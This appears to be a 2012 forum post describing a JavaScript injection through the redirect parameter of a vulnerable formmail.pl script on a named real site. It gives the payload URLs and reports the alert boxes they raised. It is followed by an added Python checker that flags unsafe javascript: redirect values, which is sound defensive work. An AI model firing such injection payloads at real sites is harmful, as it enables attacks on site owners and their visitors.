formmail.pl javascript alert tag plus html alert tag within javascript tag
Date: February 05, 2012 11:37AM
Hello guys, I just found out on my own how to include HTML within JavaScript... A working link with a vulnerable formmail is here:
http://apo rre alo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert%28123%29;alert%28document.write.value=%3Ch1%3EHello%20%3C/h1%3E%29;
Notice the URL encoding...
The original formmail JavaScript injection was:
http://apo rr ealo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert(123);alert(document.write.value=<h1>Hello</h1>);
I used this in Firefox version 7. When I copied it here, the message board system automatically encoded the tags and parentheses.
After I injected the code, I got a 302 error that looked like this:
Found
The document has moved here.
Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4 Server at aporrealos.com Port 80
A 123 alert box popped up and later a Hello alert box popped up.
Edited 1 time(s). Last edit at 02/05/2012 11:38AM by johndoe.
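An added example, not part of the original post and not FormMail's own code: a check a defender could apply to the `redirect` parameter shown in the post, usable both as an allowlist before the script emits its 302 and as an audit over logged request URLs. The allowed host, the function names and the sample URLs are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"www.example.org"}  # assumption: hosts the form may redirect to


def redirect_is_safe(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for an absolute http(s) URL whose host is allowlisted."""
    # Browsers strip whitespace/control characters and treat "\" like "/",
    # so either can make the parsed value differ from what actually loads.
    if "\\" in target or any(ch <= " " or ch == "\x7f" for ch in target):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. a malformed IPv6 literal
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # rejects javascript:, data:, "//host" and relative paths
    return (parts.hostname or "").lower() in allowed_hosts


def unsafe_redirects(request_url, allowed_hosts=ALLOWED_HOSTS):
    """Return the redirect values in a formmail.pl request that fail the check."""
    parts = urlsplit(request_url)
    if not parts.path.lower().endswith("formmail.pl"):
        return []
    values = parse_qs(parts.query).get("redirect", [])  # percent-decoded values
    return [v for v in values if not redirect_is_safe(v, allowed_hosts)]


# Constructed sample requests; example.org is a placeholder host.
SAMPLES = [
    "http://www.example.org/cgi-sys/formmail.pl?recipient=a@example.org"
    "&subject=1&redirect=javascript:alert%28123%29",
    "http://www.example.org/cgi-sys/formmail.pl?recipient=a@example.org"
    "&subject=1&redirect=https%3A%2F%2Fwww.example.org%2Fthanks.html",
]

if __name__ == "__main__":
    for url in SAMPLES:
        bad = unsafe_redirects(url)
        print("FLAG" if bad else "ok  ", bad)
```

The check accepts only absolute URLs; a site that redirects to relative paths would need to resolve them against its own origin before validating.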